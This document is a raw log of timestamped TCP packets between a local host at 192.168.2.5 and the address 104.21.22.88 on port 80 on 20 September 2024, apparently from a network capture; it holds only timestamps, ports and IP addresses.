                                                              Sep 20, 2024 12:00:07.901782036 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.901796103 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.901818991 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.901849031 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.901863098 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.901878119 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.901885033 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.901892900 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.901910067 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.901943922 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.901958942 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.901990891 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.902004957 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.902029037 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.902043104 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.902043104 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.902057886 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.902071953 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.902074099 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.902087927 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.902102947 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.902108908 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.902123928 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.902141094 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.902147055 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.902156115 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.902172089 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.902179003 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.902185917 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.902199984 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.902201891 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.902235031 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.903414011 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903436899 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903460026 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903472900 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.903474092 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903491020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903513908 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903527021 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903532982 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.903542042 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903551102 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.903563023 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903572083 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.903577089 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903593063 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903608084 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.903669119 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903714895 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.903738976 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903754950 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903770924 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903783083 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.903784037 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.903851032 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989140987 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989207029 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989221096 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989279032 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989330053 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989345074 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989358902 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989370108 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989382029 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989393950 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989398003 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989413023 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989435911 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989449978 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989464998 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989470959 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989479065 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989495039 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989500046 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989510059 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989531040 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989532948 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989547968 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989562988 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989564896 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989578962 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989593983 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989598989 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989609003 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989624023 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989628077 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989639997 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989655018 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989655972 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989671946 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989682913 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989705086 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989720106 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989733934 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989734888 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989759922 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989765882 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989775896 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989793062 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989806890 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989809990 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989821911 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989836931 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989862919 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989876986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989892006 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989895105 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989905119 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989919901 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989928007 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989934921 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989950895 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989953041 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989967108 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.989979982 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.989984035 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990006924 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990014076 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.990022898 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990039110 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990056992 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.990056992 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990072966 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990087986 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990088940 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.990103006 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990118980 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990124941 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.990153074 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.990200996 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990216970 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990230083 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990245104 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990258932 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990267038 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.990272999 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990289927 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990303993 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990318060 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.990330935 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.990350962 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.991241932 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991257906 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991271019 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991292953 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991307020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991314888 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.991322041 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991337061 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991350889 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991364956 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991379023 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991393089 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.991405010 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991420031 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.991420031 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991435051 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.991436958 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991452932 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991467953 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991468906 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.991498947 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.991774082 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991832972 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991844893 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991897106 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991899014 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.991910934 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991925955 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991940975 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991942883 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.991957903 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.991965055 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.991987944 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.992274046 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992326975 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992341995 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992357016 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992357969 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.992424011 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992429972 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.992471933 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992486954 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992501020 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992503881 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.992525101 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992531061 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.992541075 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992572069 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.992618084 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992743015 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992757082 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992774010 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.992774010 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992790937 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992805958 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992816925 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992835045 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.992841959 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992857933 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992872000 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992875099 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.992889881 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992902040 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.992903948 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.992932081 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.994013071 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994035959 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994050026 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994141102 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.994142056 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994158030 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994175911 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.994180918 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994195938 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994210958 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994213104 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.994227886 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994245052 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994249105 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.994261026 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994277000 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994280100 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.994293928 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994308949 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.994338036 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994352102 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994365931 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:07.994369984 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:07.994399071 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.079807043 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.079823971 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.079838991 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.079914093 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.079948902 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.079963923 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.079977989 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.079992056 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.079993010 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080013037 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080018044 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080033064 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080046892 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080061913 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080076933 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080082893 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080092907 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080110073 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080141068 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080157995 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080172062 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080177069 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080188036 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080199003 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080203056 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080219030 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080233097 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080239058 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080248117 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080261946 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080271006 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080286026 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080300093 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080303907 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080316067 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080336094 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080363035 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080378056 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080391884 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080394030 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080406904 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080426931 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080427885 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080442905 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080456972 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080466032 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080482960 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080496073 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080497980 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080513000 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080527067 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080539942 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080563068 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080569983 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080578089 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080593109 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080609083 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080610037 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080645084 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080703974 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080735922 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080749989 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080763102 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080770016 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080779076 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080791950 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080796957 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080807924 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080822945 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080825090 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080838919 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080853939 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080861092 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080873013 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080883026 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080888033 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080904007 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080919027 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080921888 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080935001 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080950022 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.080950975 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080965042 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.080977917 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.081572056 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.081593990 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.081608057 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.081618071 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.081670046 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.081697941 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.081712961 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.081727982 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.081743002 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.081744909 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.081758976 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.081773043 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.081787109 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.081800938 CEST8049724104.21.22.88192.168.2.5
                                                              Sep 20, 2024 12:00:08.081803083 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.081820965 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.081840992 CEST4972480192.168.2.5104.21.22.88
                                                              Sep 20, 2024 12:00:08.081851959 CEST8049724104.21.22.88192.168.2.5
